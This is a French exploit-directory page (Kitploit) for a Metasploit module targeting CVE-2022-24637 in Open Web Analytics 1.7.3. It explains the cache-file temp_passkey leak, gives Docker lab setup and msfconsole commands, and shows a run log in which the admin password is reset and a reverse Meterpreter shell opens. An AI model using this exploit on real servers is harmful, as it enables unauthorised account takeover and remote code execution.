Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-24637 — Open Web Analytics 1.7.3 - Exécution de code à distance | Kitploit
Outils/GitHubGitHub/pflegusch/cve-2022-24637
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubpflegusch/cve-2022-24637

CVE-2022-24637

Open Web Analytics 1.7.3 - Exécution de code à distance

Voir le dépôt
44il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Application vulnérable

Open Web Analytics (OWA) avant la version 1.7.4 permet à un attaquant distant non authentifié d'obtenir des informations sensibles sur les utilisateurs, qui peuvent être utilisées pour obtenir des privilèges administrateur en exploitant les hachages de cache. Cela se produit car les fichiers générés avec '<?php (au lieu de la séquence prévue "<?php) ne sont pas traités par l'interpréteur PHP.

Étapes de vérification

  1. Démarrer une instance vulnérable d'OWA avec docker

    • Télécharger https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
    • Démarrer les conteneurs : docker compose up -d
    • Ouvrir http://127.0.0.1:80/
    • Suivre les étapes d'installation en utilisant les variables d'environnement du fichier docker-compose.yml
      • Public URL : http://127.0.0.1/
      • Database Host (docker inspect <db-container> et obtenir IPAddress, par ex )
172.22.0.2
  • Database Port : 3306
  • Database Name : owa
  • Database User : owa
  • Database Password : Demo12+#
  • Continuer
  • Site Domain : http://127.0.0.1
  • Admin name : admin
  • E-Mail : [email protected]
  • Password : Demo12+#
  • Continuer
  • Démarrer msfconsole

  • use exploit/multi/http/open_web_analytics_rce

  • set RHOSTS 127.0.0.1

  • set RPORT 80

  • set SSL false

  • set LHOST 172.22.0.1 -> cela doit être l'IP du pont créée avec la commande docker compose up -d

  • check

  • run

  • Options

    Mot de passe

    Lors de l'exploitation de la cible, le mot de passe de l'utilisateur attaqué sera remplacé par ce mot de passe.

    Nom d'utilisateur

    L'utilisateur qui sera ciblé par cet exploit.

    Options avancées

    SearchLimit

    L'exploit fonctionne en récupérant une valeur temp_passkey à partir d'un fichier de cache qui est créé pour chaque utilisateur lors d'une tentative de connexion. Le répertoire /owa-data/caches/ étant accessible publiquement, nous pouvons récupérer ces fichiers de cache. Le chemin exact des fichiers de cache dépend de l'user_id et peut être calculé à partir de celui-ci. Cette option définit combien de chemins calculés, en commençant à 0, doivent être vérifiés pour trouver des fichiers de cache contenant la valeur temp_passkey.

    Scénarios

    Version 1.7.3 utilisant le déploiement docker ci-dessus

    root@kitploit:~
    msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
    RHOSTS => 127.0.0.1
    msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
    LHOST => 172.22.0.1
    msf6 exploit(multi/http/open_web_analytics_rce) > run
    
    [*] Started reverse TCP handler on 172.22.0.1:4444 
    [*] Running automatic check ("set AutoCheck false" to disable)
    [+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
    [+] Connected to http://127.0.0.1/ successfully!
    [*] Attempting to find cache of 'admin' user
    [+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
    [+] Changed the password of 'admin' to 'pwned'
    [+] Logged in as admin user
    [*] Creating log file
    [+] Wrote payload to file
    [*] Sending stage (39927 bytes) to 172.22.0.3
    [+] Deleted QY0yivK4.php
    [*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
    [+] Triggering payload! Check your listener!
    
    meterpreter > pwd
    /var/www/html/owa-data/caches
    meterpreter > getuid
    Server username: www-data
    meterpreter >
    
    Télécharger l’outil